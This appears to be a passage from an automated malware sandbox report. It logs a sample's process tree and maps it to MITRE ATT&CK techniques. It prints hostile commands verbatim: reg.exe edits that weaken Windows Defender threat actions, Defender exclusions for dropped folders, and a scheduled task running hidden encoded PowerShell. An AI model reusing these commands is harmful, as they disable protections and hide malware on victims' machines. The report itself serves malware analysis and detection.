"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:7372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:7400

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:7908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:6768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:6088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:6712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:7188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:6372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KmXbIhtWbIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KmXbIhtWbIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MnOxAeNoQdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MnOxAeNoQdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bRTZqcBYvMDSC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bRTZqcBYvMDSC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWqpiVgDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWqpiVgDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xIEXRqWjchMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xIEXRqWjchMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ojjKVxSmzoxRqFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ojjKVxSmzoxRqFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mgdBYFJOGqDaUVoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mgdBYFJOGqDaUVoC\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4572

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:7444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MnOxAeNoQdUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MnOxAeNoQdUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRTZqcBYvMDSC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRTZqcBYvMDSC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:6528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWqpiVgDU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWqpiVgDU" /t REG_DWORD /d 0 /reg:64
3⤵
- Adds Run key to start application
PID:4108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xIEXRqWjchMU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xIEXRqWjchMU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ojjKVxSmzoxRqFVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:6464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ojjKVxSmzoxRqFVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:6972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo /t REG_DWORD /d 0 /reg:32
3⤵
PID:7180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo /t REG_DWORD /d 0 /reg:64
3⤵
PID:5600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM /t REG_DWORD /d 0 /reg:32
3⤵
PID:7496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM /t REG_DWORD /d 0 /reg:64
3⤵
PID:6440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mgdBYFJOGqDaUVoC /t REG_DWORD /d 0 /reg:32
3⤵
PID:8000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mgdBYFJOGqDaUVoC /t REG_DWORD /d 0 /reg:64
3⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKKEzsrpU" /SC once /ST 01:56:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4956

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKKEzsrpU"
2⤵
PID:3340

C:\Users\Admin\AppData\Roaming\airgjjr
C:\Users\Admin\AppData\Roaming\airgjjr
1⤵
PID:6896

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\ACAD.tmp.exe
C:\Users\Admin\AppData\Local\Temp\ACAD.tmp.exe
1⤵
PID:7320

C:\Users\Admin\AppData\Local\Temp\BC4E.tmp.exe
C:\Users\Admin\AppData\Local\Temp\BC4E.tmp.exe
1⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\D7D6.tmp.exe
C:\Users\Admin\AppData\Local\Temp\D7D6.tmp.exe
1⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\ED72.tmp.exe
C:\Users\Admin\AppData\Local\Temp\ED72.tmp.exe
1⤵
- Suspicious use of SetThreadContext
PID:6884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:4504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:2108

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6760

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6132

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7224

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:4272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4652

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5056

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6028

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:7068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:5608

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7160

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:7920

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery